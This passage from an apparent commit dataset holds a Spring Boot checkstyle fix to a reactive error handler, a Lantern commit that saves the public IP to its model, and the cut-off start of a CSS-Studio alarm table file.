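                System.out.println("ConnObjectKey ext attr: " + connObjectKeyItem.get().getExtAttrName());
            } else {
                System.out.println("No ConnObjectKey item defined, skipping key handling");
            }
        }
    }
}

The same structure is what the commit applies inside prepareAttrs: the key rewrite, NAME evaluation, and duplicate-key insertion are all moved inside the isPresent() branch.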
Java
apache-2.0
617f97f788e70c61f7c942ddc9126ef2c09c73d7
0
aahlenst/spring-boot,mdeinum/spring-boot,Buzzardo/spring-boot,kdvolder/spring-boot,rweisleder/spring-boot,jxblum/spring-boot,wilkinsona/spring-boot,vpavic/spring-boot,tiarebalbi/spring-boot,chrylis/spring-boot,spring-projects/spring-boot,rweisleder/spring-boot,wilkinsona/spring-boot,kdvolder/spring-boot,NetoDevel/spring-boot,Buzzardo/spring-boot,shakuzen/spring-boot,aahlenst/spring-boot,NetoDevel/spring-boot,lburgazzoli/spring-boot,michael-simons/spring-boot,royclarkson/spring-boot,kdvolder/spring-boot,jxblum/spring-boot,vpavic/spring-boot,yangdd1205/spring-boot,ilayaperumalg/spring-boot,philwebb/spring-boot,vpavic/spring-boot,michael-simons/spring-boot,spring-projects/spring-boot,mbenson/spring-boot,philwebb/spring-boot,mdeinum/spring-boot,michael-simons/spring-boot,htynkn/spring-boot,aahlenst/spring-boot,mbenson/spring-boot,kdvolder/spring-boot,Buzzardo/spring-boot,Buzzardo/spring-boot,tiarebalbi/spring-boot,philwebb/spring-boot,tiarebalbi/spring-boot,Buzzardo/spring-boot,eddumelendez/spring-boot,dreis2211/spring-boot,eddumelendez/spring-boot,ilayaperumalg/spring-boot,joshiste/spring-boot,lburgazzoli/spring-boot,lburgazzoli/spring-boot,tiarebalbi/spring-boot,shakuzen/spring-boot,royclarkson/spring-boot,michael-simons/spring-boot,royclarkson/spring-boot,Buzzardo/spring-boot,ilayaperumalg/spring-boot,NetoDevel/spring-boot,NetoDevel/spring-boot,aahlenst/spring-boot,joshiste/spring-boot,htynkn/spring-boot,rweisleder/spring-boot,michael-simons/spring-boot,htynkn/spring-boot,eddumelendez/spring-boot,scottfrederick/spring-boot,aahlenst/spring-boot,rweisleder/spring-boot,eddumelendez/spring-boot,aahlenst/spring-boot,spring-projects/spring-boot,ilayaperumalg/spring-boot,vpavic/spring-boot,wilkinsona/spring-boot,rweisleder/spring-boot,lburgazzoli/spring-boot,wilkinsona/spring-boot,tiarebalbi/spring-boot,philwebb/spring-boot,royclarkson/spring-boot,mbenson/spring-boot,spring-projects/spring-boot,joshiste/spring-boot,scottfrederick/spring-boot,dreis2211/spring-boot,rweisleder/spring-boot,scottfrederick/spring-boot,mdeinum/spring-boot,eddumelendez/spring-boot,spring-projects/spring-boot,royclarkson/spring-boot,wilkinsona/spring-boot,chrylis/spring-boot,dreis2211/spring-boot,joshiste/spring-boot,tiarebalbi/spring-boot,vpavic/spring-boot,chrylis/spring-boot,yangdd1205/spring-boot,scottfrederick/spring-boot,htynkn/spring-boot,spring-projects/spring-boot,philwebb/spring-boot,eddumelendez/spring-boot,mbenson/spring-boot,wilkinsona/spring-boot,htynkn/spring-boot,jxblum/spring-boot,htynkn/spring-boot,ilayaperumalg/spring-boot,ilayaperumalg/spring-boot,joshiste/spring-boot,jxblum/spring-boot,joshiste/spring-boot,chrylis/spring-boot,scottfrederick/spring-boot,mdeinum/spring-boot,kdvolder/spring-boot,chrylis/spring-boot,dreis2211/spring-boot,lburgazzoli/spring-boot,kdvolder/spring-boot,dreis2211/spring-boot,philwebb/spring-boot,vpavic/spring-boot,mdeinum/spring-boot,mbenson/spring-boot,scottfrederick/spring-boot,shakuzen/spring-boot,shakuzen/spring-boot,chrylis/spring-boot,dreis2211/spring-boot,shakuzen/spring-boot,mbenson/spring-boot,jxblum/spring-boot,michael-simons/spring-boot,jxblum/spring-boot,shakuzen/spring-boot,NetoDevel/spring-boot,mdeinum/spring-boot,yangdd1205/spring-boot
/* * Copyright 2012-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.boot.autoconfigure.web.reactive.error; import java.util.Collections; import java.util.Date; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; import org.apache.commons.logging.Log; import reactor.core.publisher.Mono; import org.springframework.beans.factory.InitializingBean; import org.springframework.boot.autoconfigure.template.TemplateAvailabilityProviders; import org.springframework.boot.autoconfigure.web.ResourceProperties; import org.springframework.boot.web.reactive.error.ErrorAttributes; import org.springframework.boot.web.reactive.error.ErrorWebExceptionHandler; import org.springframework.context.ApplicationContext; import org.springframework.core.NestedExceptionUtils; import org.springframework.core.io.Resource; import org.springframework.http.HttpLogging; import org.springframework.http.HttpStatus; import org.springframework.http.codec.HttpMessageReader; import org.springframework.http.codec.HttpMessageWriter; import org.springframework.util.Assert; import org.springframework.util.CollectionUtils; import org.springframework.util.StringUtils; import org.springframework.web.reactive.function.BodyInserters; import org.springframework.web.reactive.function.server.RouterFunction; import org.springframework.web.reactive.function.server.ServerRequest; import org.springframework.web.reactive.function.server.ServerResponse; import org.springframework.web.reactive.result.view.ViewResolver; import org.springframework.web.server.ServerWebExchange; import org.springframework.web.util.HtmlUtils; /** * Abstract base class for {@link ErrorWebExceptionHandler} implementations. * * @author Brian Clozel * @since 2.0.0 * @see ErrorAttributes */ public abstract class AbstractErrorWebExceptionHandler implements ErrorWebExceptionHandler, InitializingBean { /** * Currently duplicated from Spring WebFlux HttpWebHandlerAdapter. 
*/ private static final Set<String> DISCONNECTED_CLIENT_EXCEPTIONS; static { Set<String> exceptions = new HashSet<>(); exceptions.add("AbortedException"); exceptions.add("ClientAbortException"); exceptions.add("EOFException"); exceptions.add("EofException"); DISCONNECTED_CLIENT_EXCEPTIONS = Collections.unmodifiableSet(exceptions); } private static final Log logger = HttpLogging .forLogName(AbstractErrorWebExceptionHandler.class); private final ApplicationContext applicationContext; private final ErrorAttributes errorAttributes; private final ResourceProperties resourceProperties; private final TemplateAvailabilityProviders templateAvailabilityProviders; private List<HttpMessageReader<?>> messageReaders = Collections.emptyList(); private List<HttpMessageWriter<?>> messageWriters = Collections.emptyList(); private List<ViewResolver> viewResolvers = Collections.emptyList(); public AbstractErrorWebExceptionHandler(ErrorAttributes errorAttributes, ResourceProperties resourceProperties, ApplicationContext applicationContext) { Assert.notNull(errorAttributes, "ErrorAttributes must not be null"); Assert.notNull(resourceProperties, "ResourceProperties must not be null"); Assert.notNull(applicationContext, "ApplicationContext must not be null"); this.errorAttributes = errorAttributes; this.resourceProperties = resourceProperties; this.applicationContext = applicationContext; this.templateAvailabilityProviders = new TemplateAvailabilityProviders( applicationContext); } /** * Configure HTTP message writers to serialize the response body with. * @param messageWriters the {@link HttpMessageWriter}s to use */ public void setMessageWriters(List<HttpMessageWriter<?>> messageWriters) { Assert.notNull(messageWriters, "'messageWriters' must not be null"); this.messageWriters = messageWriters; } /** * Configure HTTP message readers to deserialize the request body with. * @param messageReaders the {@link HttpMessageReader}s to use */ public void setMessageReaders(List<HttpMessageReader<?>> messageReaders) { Assert.notNull(messageReaders, "'messageReaders' must not be null"); this.messageReaders = messageReaders; } /** * Configure the {@link ViewResolver} to use for rendering views. * @param viewResolvers the list of {@link ViewResolver}s to use */ public void setViewResolvers(List<ViewResolver> viewResolvers) { this.viewResolvers = viewResolvers; } /** * Extract the error attributes from the current request, to be used to populate error * views or JSON payloads. * @param request the source request * @param includeStackTrace whether to include the error stacktrace information * @return the error attributes as a Map. */ protected Map<String, Object> getErrorAttributes(ServerRequest request, boolean includeStackTrace) { return this.errorAttributes.getErrorAttributes(request, includeStackTrace); } /** * Extract the original error from the current request. * @param request the source request * @return the error */ protected Throwable getError(ServerRequest request) { return this.errorAttributes.getError(request); } /** * Check whether the trace attribute has been set on the given request. * @param request the source request * @return {@code true} if the error trace has been requested, {@code false} otherwise */ protected boolean isTraceEnabled(ServerRequest request) { String parameter = request.queryParam("trace").orElse("false"); return !"false".equalsIgnoreCase(parameter); } /** * Render the given error data as a view, using a template view if available or a * static HTML file if available otherwise. 
This will return an empty * {@code Publisher} if none of the above are available. * @param viewName the view name * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderErrorView(String viewName, ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { if (isTemplateAvailable(viewName)) { return responseBody.render(viewName, error); } Resource resource = resolveResource(viewName); if (resource != null) { return responseBody.body(BodyInserters.fromResource(resource)); } return Mono.empty(); } private boolean isTemplateAvailable(String viewName) { return this.templateAvailabilityProviders.getProvider(viewName, this.applicationContext) != null; } private Resource resolveResource(String viewName) { for (String location : this.resourceProperties.getStaticLocations()) { try { Resource resource = this.applicationContext.getResource(location); resource = resource.createRelative(viewName + ".html"); if (resource.exists()) { return resource; } } catch (Exception ex) { // Ignore } } return null; } /** * Render a default HTML "Whitelabel Error Page". * <p> * Useful when no other error view is available in the application. * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderDefaultErrorView( ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { StringBuilder builder = new StringBuilder(); Date timestamp = (Date) error.get("timestamp"); Object message = error.get("message"); Object trace = error.get("trace"); builder.append("<html><body><h1>Whitelabel Error Page</h1>").append( "<p>This application has no configured error view, so you are seeing this as a fallback.</p>") .append("<div id='created'>").append(timestamp).append("</div>") .append("<div>There was an unexpected error (type=") .append(htmlEscape(error.get("error"))).append(", status=") .append(htmlEscape(error.get("status"))).append(").</div>"); if (message != null) { builder.append("<div>").append(htmlEscape(message)).append("</div>"); } if (trace != null) { builder.append("<div style='white-space:pre-wrap;'>") .append(htmlEscape(trace)).append("</div>"); } builder.append("</body></html>"); return responseBody.syncBody(builder.toString()); } private String htmlEscape(Object input) { return (input != null) ? HtmlUtils.htmlEscape(input.toString()) : null; } @Override public void afterPropertiesSet() throws Exception { if (CollectionUtils.isEmpty(this.messageWriters)) { throw new IllegalArgumentException("Property 'messageWriters' is required"); } } /** * Create a {@link RouterFunction} that can route and handle errors as JSON responses * or HTML views. * <p> * If the returned {@link RouterFunction} doesn't route to a {@code HandlerFunction}, * the original exception is propagated in the pipeline and can be processed by other * {@link org.springframework.web.server.WebExceptionHandler}s. 
* @param errorAttributes the {@code ErrorAttributes} instance to use to extract error * information * @return a {@link RouterFunction} that routes and handles errors */ protected abstract RouterFunction<ServerResponse> getRoutingFunction( ErrorAttributes errorAttributes); @Override public Mono<Void> handle(ServerWebExchange exchange, Throwable throwable) { if (exchange.getResponse().isCommitted() || isDisconnectedClientError(throwable)) { return Mono.error(throwable); } this.errorAttributes.storeErrorInformation(throwable, exchange); ServerRequest request = ServerRequest.create(exchange, this.messageReaders); return getRoutingFunction(this.errorAttributes).route(request) .switchIfEmpty(Mono.error(throwable)) .flatMap((handler) -> handler.handle(request)) .doOnNext((response) -> logError(request, response, throwable)) .flatMap((response) -> write(exchange, response)); } private boolean isDisconnectedClientError(Throwable ex) { return DISCONNECTED_CLIENT_EXCEPTIONS.contains(ex.getClass().getSimpleName()) || isDisconnectedClientErrorMessage( NestedExceptionUtils.getMostSpecificCause(ex).getMessage()); } private boolean isDisconnectedClientErrorMessage(String message) { message = (message != null) ? message.toLowerCase() : ""; return (message.contains("broken pipe") || message.contains("connection reset by peer")); } private void logError(ServerRequest request, ServerResponse response, Throwable throwable) { if (logger.isDebugEnabled()) { logger.debug( request.exchange().getLogPrefix() + formatError(throwable, request)); } if (response.statusCode().equals(HttpStatus.INTERNAL_SERVER_ERROR)) { logger.error(request.exchange().getLogPrefix() + "500 Server Error for " + formatRequest(request), throwable); } } private String formatError(Throwable ex, ServerRequest request) { String reason = ex.getClass().getSimpleName() + ": " + ex.getMessage(); return "Resolved [" + reason + "] for HTTP " + request.methodName() + " " + request.path(); } private String formatRequest(ServerRequest request) { String rawQuery = request.uri().getRawQuery(); String query = StringUtils.hasText(rawQuery) ? "?" + rawQuery : ""; return "HTTP " + request.methodName() + " \"" + request.path() + query + "\""; } private Mono<? extends Void> write(ServerWebExchange exchange, ServerResponse response) { // force content-type since writeTo won't overwrite response header values exchange.getResponse().getHeaders() .setContentType(response.headers().getContentType()); return response.writeTo(exchange, new ResponseContext()); } private class ResponseContext implements ServerResponse.Context { @Override public List<HttpMessageWriter<?>> messageWriters() { return AbstractErrorWebExceptionHandler.this.messageWriters; } @Override public List<ViewResolver> viewResolvers() { return AbstractErrorWebExceptionHandler.this.viewResolvers; } } }
spring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/reactive/error/AbstractErrorWebExceptionHandler.java
/* * Copyright 2012-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.boot.autoconfigure.web.reactive.error; import java.util.Collections; import java.util.Date; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; import org.apache.commons.logging.Log; import reactor.core.publisher.Mono; import org.springframework.beans.factory.InitializingBean; import org.springframework.boot.autoconfigure.template.TemplateAvailabilityProviders; import org.springframework.boot.autoconfigure.web.ResourceProperties; import org.springframework.boot.web.reactive.error.ErrorAttributes; import org.springframework.boot.web.reactive.error.ErrorWebExceptionHandler; import org.springframework.context.ApplicationContext; import org.springframework.core.NestedExceptionUtils; import org.springframework.core.io.Resource; import org.springframework.http.HttpLogging; import org.springframework.http.HttpStatus; import org.springframework.http.codec.HttpMessageReader; import org.springframework.http.codec.HttpMessageWriter; import org.springframework.util.Assert; import org.springframework.util.CollectionUtils; import org.springframework.util.StringUtils; import org.springframework.web.reactive.function.BodyInserters; import org.springframework.web.reactive.function.server.RouterFunction; import org.springframework.web.reactive.function.server.ServerRequest; import org.springframework.web.reactive.function.server.ServerResponse; import org.springframework.web.reactive.result.view.ViewResolver; import org.springframework.web.server.ServerWebExchange; import org.springframework.web.util.HtmlUtils; /** * Abstract base class for {@link ErrorWebExceptionHandler} implementations. * * @author Brian Clozel * @since 2.0.0 * @see ErrorAttributes */ public abstract class AbstractErrorWebExceptionHandler implements ErrorWebExceptionHandler, InitializingBean { /** * Currently duplicated from Spring WebFlux HttpWebHandlerAdapter. 
*/ private static final Set<String> DISCONNECTED_CLIENT_EXCEPTIONS; static { Set<String> exceptions = new HashSet<>(); exceptions.add("AbortedException"); exceptions.add("ClientAbortException"); exceptions.add("EOFException"); exceptions.add("EofException"); DISCONNECTED_CLIENT_EXCEPTIONS = Collections.unmodifiableSet(exceptions); } private static final Log logger = HttpLogging .forLogName(AbstractErrorWebExceptionHandler.class); private final ApplicationContext applicationContext; private final ErrorAttributes errorAttributes; private final ResourceProperties resourceProperties; private final TemplateAvailabilityProviders templateAvailabilityProviders; private List<HttpMessageReader<?>> messageReaders = Collections.emptyList(); private List<HttpMessageWriter<?>> messageWriters = Collections.emptyList(); private List<ViewResolver> viewResolvers = Collections.emptyList(); public AbstractErrorWebExceptionHandler(ErrorAttributes errorAttributes, ResourceProperties resourceProperties, ApplicationContext applicationContext) { Assert.notNull(errorAttributes, "ErrorAttributes must not be null"); Assert.notNull(resourceProperties, "ResourceProperties must not be null"); Assert.notNull(applicationContext, "ApplicationContext must not be null"); this.errorAttributes = errorAttributes; this.resourceProperties = resourceProperties; this.applicationContext = applicationContext; this.templateAvailabilityProviders = new TemplateAvailabilityProviders( applicationContext); } /** * Configure HTTP message writers to serialize the response body with. * @param messageWriters the {@link HttpMessageWriter}s to use */ public void setMessageWriters(List<HttpMessageWriter<?>> messageWriters) { Assert.notNull(messageWriters, "'messageWriters' must not be null"); this.messageWriters = messageWriters; } /** * Configure HTTP message readers to deserialize the request body with. * @param messageReaders the {@link HttpMessageReader}s to use */ public void setMessageReaders(List<HttpMessageReader<?>> messageReaders) { Assert.notNull(messageReaders, "'messageReaders' must not be null"); this.messageReaders = messageReaders; } /** * Configure the {@link ViewResolver} to use for rendering views. * @param viewResolvers the list of {@link ViewResolver}s to use */ public void setViewResolvers(List<ViewResolver> viewResolvers) { this.viewResolvers = viewResolvers; } /** * Extract the error attributes from the current request, to be used to populate error * views or JSON payloads. * @param request the source request * @param includeStackTrace whether to include the error stacktrace information * @return the error attributes as a Map. */ protected Map<String, Object> getErrorAttributes(ServerRequest request, boolean includeStackTrace) { return this.errorAttributes.getErrorAttributes(request, includeStackTrace); } /** * Extract the original error from the current request. * @param request the source request * @return the error */ protected Throwable getError(ServerRequest request) { return this.errorAttributes.getError(request); } /** * Check whether the trace attribute has been set on the given request. * @param request the source request * @return {@code true} if the error trace has been requested, {@code false} otherwise */ protected boolean isTraceEnabled(ServerRequest request) { String parameter = request.queryParam("trace").orElse("false"); return !"false".equalsIgnoreCase(parameter); } /** * Render the given error data as a view, using a template view if available or a * static HTML file if available otherwise. 
This will return an empty * {@code Publisher} if none of the above are available. * @param viewName the view name * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderErrorView(String viewName, ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { if (isTemplateAvailable(viewName)) { return responseBody.render(viewName, error); } Resource resource = resolveResource(viewName); if (resource != null) { return responseBody.body(BodyInserters.fromResource(resource)); } return Mono.empty(); } private boolean isTemplateAvailable(String viewName) { return this.templateAvailabilityProviders.getProvider(viewName, this.applicationContext) != null; } private Resource resolveResource(String viewName) { for (String location : this.resourceProperties.getStaticLocations()) { try { Resource resource = this.applicationContext.getResource(location); resource = resource.createRelative(viewName + ".html"); if (resource.exists()) { return resource; } } catch (Exception ex) { // Ignore } } return null; } /** * Render a default HTML "Whitelabel Error Page". * <p> * Useful when no other error view is available in the application. * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderDefaultErrorView( ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { StringBuilder builder = new StringBuilder(); Date timestamp = (Date) error.get("timestamp"); Object message = error.get("message"); Object trace = error.get("trace"); builder.append("<html><body><h1>Whitelabel Error Page</h1>").append( "<p>This application has no configured error view, so you are seeing this as a fallback.</p>") .append("<div id='created'>").append(timestamp).append("</div>") .append("<div>There was an unexpected error (type=") .append(htmlEscape(error.get("error"))).append(", status=") .append(htmlEscape(error.get("status"))).append(").</div>"); if (message != null) { builder.append("<div>").append(htmlEscape(message)).append("</div>"); } if (trace != null) { builder.append("<div style='white-space:pre-wrap;'>") .append(htmlEscape(trace)).append("</div>"); } builder.append("</body></html>"); return responseBody.syncBody(builder.toString()); } private String htmlEscape(Object input) { return (input != null) ? HtmlUtils.htmlEscape(input.toString()) : null; } @Override public void afterPropertiesSet() throws Exception { if (CollectionUtils.isEmpty(this.messageWriters)) { throw new IllegalArgumentException("Property 'messageWriters' is required"); } } /** * Create a {@link RouterFunction} that can route and handle errors as JSON responses * or HTML views. * <p> * If the returned {@link RouterFunction} doesn't route to a {@code HandlerFunction}, * the original exception is propagated in the pipeline and can be processed by other * {@link org.springframework.web.server.WebExceptionHandler}s. 
* @param errorAttributes the {@code ErrorAttributes} instance to use to extract error * information * @return a {@link RouterFunction} that routes and handles errors */ protected abstract RouterFunction<ServerResponse> getRoutingFunction( ErrorAttributes errorAttributes); @Override public Mono<Void> handle(ServerWebExchange exchange, Throwable throwable) { if (exchange.getResponse().isCommitted() || isDisconnectedClientError(throwable)) { return Mono.error(throwable); } this.errorAttributes.storeErrorInformation(throwable, exchange); ServerRequest request = ServerRequest.create(exchange, this.messageReaders); return getRoutingFunction(this.errorAttributes).route(request) .switchIfEmpty(Mono.error(throwable)) .flatMap((handler) -> handler.handle(request)) .doOnNext((response) -> logError(request, response, throwable)) .flatMap((response) -> write(exchange, response)); } private boolean isDisconnectedClientError(Throwable ex) { return DISCONNECTED_CLIENT_EXCEPTIONS.contains(ex.getClass().getSimpleName()) || isDisconnectedClientErrorMessage( NestedExceptionUtils.getMostSpecificCause(ex).getMessage()); } private boolean isDisconnectedClientErrorMessage(String message) { message = message != null ? message.toLowerCase() : ""; return (message.contains("broken pipe") || message.contains("connection reset by peer")); } private void logError(ServerRequest request, ServerResponse response, Throwable throwable) { if (logger.isDebugEnabled()) { logger.debug( request.exchange().getLogPrefix() + formatError(throwable, request)); } if (response.statusCode().equals(HttpStatus.INTERNAL_SERVER_ERROR)) { logger.error(request.exchange().getLogPrefix() + "500 Server Error for " + formatRequest(request), throwable); } } private String formatError(Throwable ex, ServerRequest request) { String reason = ex.getClass().getSimpleName() + ": " + ex.getMessage(); return "Resolved [" + reason + "] for HTTP " + request.methodName() + " " + request.path(); } private String formatRequest(ServerRequest request) { String rawQuery = request.uri().getRawQuery(); String query = StringUtils.hasText(rawQuery) ? "?" + rawQuery : ""; return "HTTP " + request.methodName() + " \"" + request.path() + query + "\""; } private Mono<? extends Void> write(ServerWebExchange exchange, ServerResponse response) { // force content-type since writeTo won't overwrite response header values exchange.getResponse().getHeaders() .setContentType(response.headers().getContentType()); return response.writeTo(exchange, new ResponseContext()); } private class ResponseContext implements ServerResponse.Context { @Override public List<HttpMessageWriter<?>> messageWriters() { return AbstractErrorWebExceptionHandler.this.messageWriters; } @Override public List<ViewResolver> viewResolvers() { return AbstractErrorWebExceptionHandler.this.viewResolvers; } } }
Fix checkstyle violation
spring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/reactive/error/AbstractErrorWebExceptionHandler.java
Fix checkstyle violation
<ide><path>pring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/reactive/error/AbstractErrorWebExceptionHandler.java <ide> } <ide> <ide> private boolean isDisconnectedClientErrorMessage(String message) { <del> message = message != null ? message.toLowerCase() : ""; <add> message = (message != null) ? message.toLowerCase() : ""; <ide> return (message.contains("broken pipe") <ide> || message.contains("connection reset by peer")); <ide> }
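The change above is purely cosmetic: the diff suggests the project's checkstyle configuration expects the condition of a ternary expression to be parenthesized, and the commit adds those parentheses without altering behaviour. A minimal sketch of the two forms, assuming hypothetical method names that are not part of the original class:

// Both methods behave identically; only the second matches the parenthesized-condition
// style enforced by the build, as implied by the diff above.
public class TernaryStyleSketch {

    static String normalizeOld(String message) {
        // old form, flagged by the style check
        return message != null ? message.toLowerCase() : "";
    }

    static String normalizeNew(String message) {
        // new form, condition wrapped in parentheses
        return (message != null) ? message.toLowerCase() : "";
    }

    public static void main(String[] args) {
        System.out.println(normalizeOld("Broken Pipe").equals(normalizeNew("Broken Pipe"))); // true
        System.out.println(normalizeOld(null).equals(normalizeNew(null)));                   // true
    }
}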
Java
apache-2.0
f53ef362f32ed1531ce46ae04ebd977a4ae219ce
0
lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,getlantern/lantern-java,lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java,lqch14102/lantern,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java
package org.lantern; import java.net.InetAddress; import java.util.TimerTask; import org.lantern.event.Events; import org.lantern.state.Connectivity; import org.lantern.state.Model; import org.lastbamboo.common.stun.client.PublicIpAddress; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.google.inject.Inject; public class ConnectivityChecker extends TimerTask { private static Logger LOG = LoggerFactory .getLogger(ConnectivityChecker.class); private final Model model; private boolean connected = false; @Inject ConnectivityChecker(final Model model) { this.model = model; } @Override public void run() { final InetAddress ip = new PublicIpAddress().getPublicIpAddress(); Connectivity connectivity = model.getConnectivity(); if (ip == null) { LOG.info("No IP -- possibly no internet connection"); if (connected) { connected = false; ConnectivityChangedEvent event = new ConnectivityChangedEvent(false, false, null); Events.asyncEventBus().post(event); } return; } String oldIp = connectivity.getIp(); String newIpString = ip.getHostAddress(); connectivity.setIp(newIpString); if (newIpString.equals(oldIp)) { if (!connected) { ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, true, ip); Events.asyncEventBus().post(event); connected = true; } } else { connected = true; ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, false, ip); Events.asyncEventBus().post(event); } } }
src/main/java/org/lantern/ConnectivityChecker.java
package org.lantern; import java.net.InetAddress; import java.util.TimerTask; import org.lantern.event.Events; import org.lantern.state.Connectivity; import org.lantern.state.Model; import org.lastbamboo.common.stun.client.PublicIpAddress; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.google.inject.Inject; public class ConnectivityChecker extends TimerTask { private static Logger LOG = LoggerFactory .getLogger(ConnectivityChecker.class); private final Model model; private boolean connected = false; @Inject ConnectivityChecker(final Model model) { this.model = model; } @Override public void run() { final InetAddress ip = new PublicIpAddress().getPublicIpAddress(); Connectivity connectivity = model.getConnectivity(); if (ip == null) { LOG.info("No IP -- possibly no internet connection"); if (connected) { connected = false; ConnectivityChangedEvent event = new ConnectivityChangedEvent(false, false, null); Events.asyncEventBus().post(event); } return; } String oldIp = connectivity.getIp(); String newIpString = ip.getHostAddress(); if (newIpString.equals(oldIp)) { if (!connected) { ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, true, ip); Events.asyncEventBus().post(event); connected = true; } } else { connected = true; ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, false, ip); Events.asyncEventBus().post(event); } } }
set model ip
src/main/java/org/lantern/ConnectivityChecker.java
set model ip
<ide><path>rc/main/java/org/lantern/ConnectivityChecker.java <ide> } <ide> String oldIp = connectivity.getIp(); <ide> String newIpString = ip.getHostAddress(); <add> connectivity.setIp(newIpString); <ide> if (newIpString.equals(oldIp)) { <ide> if (!connected) { <ide> ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, true, ip);
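The diff above adds connectivity.setIp(newIpString) immediately after the old value is read, so the model always carries the freshly detected public address while the subsequent comparison still sees the previous one. The sketch below isolates that ordering; the Connectivity class here is a plain holder standing in for the Lantern model class, and the addresses are made-up examples.

// Read the previous value first, then update the model, then compare: the model is
// current even when the address has not changed, and the change detection still works.
public class SetModelIpSketch {

    // Stand-in for the Lantern Connectivity model object.
    static class Connectivity {
        private String ip;

        String getIp() {
            return ip;
        }

        void setIp(String ip) {
            this.ip = ip;
        }
    }

    public static void main(String[] args) {
        Connectivity connectivity = new Connectivity();
        connectivity.setIp("203.0.113.10");

        String newIpString = "203.0.113.42"; // freshly detected public address

        String oldIp = connectivity.getIp();   // capture previous value first
        connectivity.setIp(newIpString);       // model now reflects the current address

        if (newIpString.equals(oldIp)) {
            System.out.println("IP unchanged");
        } else {
            System.out.println("IP changed from " + oldIp + " to " + newIpString);
        }
    }
}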
Java
epl-1.0
592173f260539b4c8f7d3e34e11b2652b752cc0d
0
css-iter/cs-studio,ESSICS/cs-studio,ESSICS/cs-studio,ControlSystemStudio/cs-studio,css-iter/cs-studio,ESSICS/cs-studio,css-iter/cs-studio,ControlSystemStudio/cs-studio,ESSICS/cs-studio,css-iter/cs-studio,ControlSystemStudio/cs-studio,css-iter/cs-studio,ControlSystemStudio/cs-studio,ESSICS/cs-studio,css-iter/cs-studio,ESSICS/cs-studio,ControlSystemStudio/cs-studio,ControlSystemStudio/cs-studio,css-iter/cs-studio,ESSICS/cs-studio
/* * Copyright (c) 2006 Stiftung Deutsches Elektronen-Synchroton, * Member of the Helmholtz Association, (DESY), HAMBURG, GERMANY. * * THIS SOFTWARE IS PROVIDED UNDER THIS LICENSE ON AN "../AS IS" BASIS. * WITHOUT WARRANTY OF ANY KIND, EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR PARTICULAR PURPOSE AND * NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE * FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR * THE USE OR OTHER DEALINGS IN THE SOFTWARE. SHOULD THE SOFTWARE PROVE DEFECTIVE * IN ANY RESPECT, THE USER ASSUMES THE COST OF ANY NECESSARY SERVICING, REPAIR OR * CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. * NO USE OF ANY SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER. * DESY HAS NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, * OR MODIFICATIONS. * THE FULL LICENSE SPECIFYING FOR THE SOFTWARE THE REDISTRIBUTION, MODIFICATION, * USAGE AND OTHER RIGHTS AND OBLIGATIONS IS INCLUDED WITH THE DISTRIBUTION OF THIS * PROJECT IN THE FILE LICENSE.HTML. IF THE LICENSE IS NOT INCLUDED YOU MAY FIND A COPY * AT HTTP://WWW.DESY.DE/LEGAL/LICENSE.HTM */ package org.csstudio.alarm.table; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Date; import java.util.GregorianCalendar; import java.util.HashMap; import java.util.Observable; import java.util.Observer; import org.csstudio.alarm.dbaccess.ArchiveDBAccess; import org.csstudio.alarm.dbaccess.archivedb.ILogMessageArchiveAccess; import org.csstudio.alarm.table.dataModel.JMSMessage; import 